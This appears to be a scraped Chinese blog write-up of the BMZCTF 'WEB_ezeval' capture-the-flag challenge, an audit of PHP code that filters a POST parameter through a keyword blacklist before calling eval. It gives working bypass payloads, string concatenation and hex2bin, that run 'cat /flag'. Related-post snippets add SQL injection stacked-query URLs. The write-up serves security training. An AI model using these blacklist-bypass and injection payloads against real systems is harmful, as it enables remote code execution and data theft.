BMZCTF WEB_ezeval

最新推荐文章于 2021-07-06 14:20:44 发布
最新推荐文章于 2021-07-06 14:20:44 发布
阅读量1k 收藏
点赞数 3
分类专栏: CTF刷题记录 文章标签: web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/113357725
版权

WEB_ezeval

题目简介:

打开后是一段php代码,进行代码审计:

 <?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);

?>

大致思路是:我们要将需要POST传入的命令执行语句放进$cmd中,并且绕过这个过滤str_ireplace()函数。

相关知识:

htmlspecialchars() 函数:htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。

str_ireplace() 函数:str_ireplace() 函数替换字符串中的一些字符(不区分大小写)。

//运行实例
<?php
echo str_ireplace("WORLD","Peter","Hello world!");
?>

输出:Hello Peter!

eval()函数:把字符串作为PHP代码执行。

解法:

一、拼接字符串绕过

cmd=(s.y.s.t.e.m)('cat /flag');  //.在php中有连接字符串的作用,所以用来拼接字符串

二、进制编码绕过

cmd=hex2bin('73797374656d')('cat /flag');

PHP hex2bin() 函数:把十六进制值转换为 ASCII 字符.

 

 

Sk1y
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
BMZCTF_WEB_ezeval
Kobalos的博客
09-24 198
查看代码 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','in.
ctf逆向解题——re1-附件资源
03-02
ctf逆向解题——re1-附件资源
第一届BMZCTF公开赛-WEB-Writeup
末初的CSDN博客
12-30 3889
文章目录ezevalezphppenetrationBMZ_Market 前言 首先恭喜白帽子社区团队成功举办第一届BMZCTF公开赛,我是本次比赛MISC赛题Snake、Tiga的出题人末初 以下是我对于的这次BMZCTF公开赛的WEB赛题的一些Writeup,如果有什么写的不对的还请师傅们留言斧正 ezeval <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_li
BMZCTF-WEB_ezeval
CHAWUCIREN1的博客
04-28 198
BMZCTF-WEB_ezeval 又是PHP代码审计的东西。 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','asser
[BMZCTF]-WEB_ezeval
cjdgg的博客
05-14 186
[BMZCTF]-WEB_ezeval 这题也是直接给出php源代码,代码也很直接,只要我们将数据绕过htmlspecialchars()和str_ireplace()就可以执行传入的cmd htmlspecialchars() 函数:htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。 str_ireplace() 函数:str_ireplace() 函数替换字符串中的一些字符(不区分大小写)。 简单来说,这题考察的就是黑名单的绕过,这里直接推荐mochu大佬的文章 第
BMZCTF内存取证三项.zip
10-21
BMZCTF内存取证三项.zip》是一个与网络安全和取证相关的压缩文件,包含了一次可能的CTF(Capture The Flag)挑战。从标题和描述中,我们可以推测这是一场涉及解密、密码学以及文件分析的竞赛。接下来,我们将深入...
androidpn 消息推送 服务器端源码
08-10
4. **Web管理界面**:描述中提到,AndroidPN包含一个Web管理页面,这使得开发者可以直观地监控推送状态,管理设备信息,以及发送测试消息。这部分源码涉及到前端技术,如HTML、CSS和JavaScript,以及后端与前端交互...
2020祥云杯 CTFNu1L.pdf
03-15
2020祥云杯 CTF WP 高清PDF版
BMZctf WEB_ezeval WP
weixin_50597969的博客
05-17 302
BMZctf WEB_ezeval WP 先审计一下代码 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert'
BMZCLUB-WEB_ezeval
qq_24033605的博客
04-10 200
WEB_ezeval 打开得到一段PHP代码。 简单分析一下, 1.提交的方式为POST 2.注入点为cmd 3.绕过黑名单 应该是通过cmd命令打开/flag文件。但是system被列入了黑名单。 我们使用点绕过的方式。在PHP中,点符号是连接符的意思,相当于其他语言中的+。 这里构造payload为: cmd=(s.y.s.t.e.m)(‘dir’); ...
BMZCTF——web(hctf、随便注、ezeval
LizePing_的博客
07-06 385
BMZCTF——webhctf_2018_warmup做题思路强网杯 2019 随便注做题思路三级目录 hctf_2018_warmup 做题思路 打开题目链接,F12查看元素,看到注释有source.php,访问看看 访问目录得到一个php代码,不妨看一看他要表达什么。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page)
GKCTF EZ三剑客-EzWeb 题目分析总结
crispr的博客
06-30 2502
此篇文章在安全客首发,仅转载到个人博客 https://www.anquanke.com/post/id/209117 前言 刚考完考试自己在buu上复现的,之前没来得及做,复习去了,虽然还是考的很菜(我是fw 。记录一下学习过程吧 正言 GKCTF EZ三剑客-EzWeb 看到这个题前端和我自己出的一个题实在是很像,同样是输入一个url,先看题目长啥样吧。 嗯,啥也没有,输入url基本没反应,F12给的提示是?secret,输入后发现: 这就很敏感了,相当于一个 ifconfig 的命令,这个时.
htmlspecialchars() 函数过滤XSS的问题
热门推荐
qlxmy的博客
03-05 1万+
htmlspecialchars()函数的功能如下: htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。 预定义的字符是: & (和号)成为 &" (双引号)成为 "' (单引号)成为 '> (大于)成为 > 它的语法如下: htmlspecialchars(string,flags,character-set,double_en
BMZCTF-Web WriteUp
Crazy198410的博客
11-15 1352
Web 题 hctf_2018_warmup 打开后是一张图片。 查看源码发现source.php 访问,得到一串代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.
[WEB_ezeval]
o3Ev的博客
05-01 314
[WEB_ezeval] 题目: 打开环境,得到: <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','e
end 21-4-19
qq_45781155的博客
04-19 163
强网杯 2019 随便注 http://www.bmzclub.cn:20431/?inject=1';show database;# http://www.bmzclub.cn:20431/?inject=1';show tables;# http://www.bmzclub.cn:20431/?inject=1';show columns from flagg;# http://www.bmzclub.cn:20431/?inject=1';sEt @a=concat("sel","ect fla
BMZCTF Web up
qq_26243045的博客
01-14 313
打开页面。 发现没有什么有用的信息,查看源代码也一样。 于是进行目录扫描: 发现了两个页面。分别打开。 index.html 无用。 upload.html: 是一个文件上传点。 先尝试上传正常图片: 可以看到,文件的临时目录和文件上传后的存储位置。 查看上传后的文件: 可以看到,是以代码的形式显示出来,而不是图片。 也就是说我们可以上传图片马来执行命令。 上传一个php文件: 多次尝试,发现是白名单过滤。而且文件内容还会被重写。我们就想到了二次渲染。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值